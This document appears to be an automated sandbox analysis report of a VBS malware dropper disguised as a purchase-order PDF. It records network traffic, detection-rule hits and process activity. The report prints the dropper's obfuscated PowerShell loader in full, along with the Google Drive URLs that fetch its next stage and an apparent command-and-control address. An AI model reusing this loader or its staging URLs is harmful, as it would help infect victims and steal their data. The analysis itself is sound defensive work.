                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/check.php?s=am9ntjjwY
                Source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D7826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3029993091.0000000004471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.3029993091.0000000004471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D77E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPB
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5C97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D74A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: powershell.exe, 00000002.00000002.2280020509.00000297EE1A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u32
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_uP
                Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_uXR
                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: msiexec.exeString found in binary or memory: https://drive.usercontent.google.com/
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5F05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download
                Source: msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.coma
                Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D6650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49715 version: TLS 1.2

                System Summary

                Source: amsi32_5588.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5972, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5588, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? 
DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848D9B276
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848D9C022
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02CCF320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02CCFBF0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BBF2BF
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC0E93
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC468F
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC4782
                Source: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs Initial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6878
                Source: unknown Process created: Commandline size = 6878
                Source: amsi32_5588.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5972, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5588, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@8/10@2/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Tavell.Vrd
                Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziide4ti.rqg.ps1
                Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5972
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5588
                Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: msiexec.exe, 00000007.00000003.2459414589.0000000021E55000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs Virustotal: Detection: 12%
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? 
DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, sxs.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
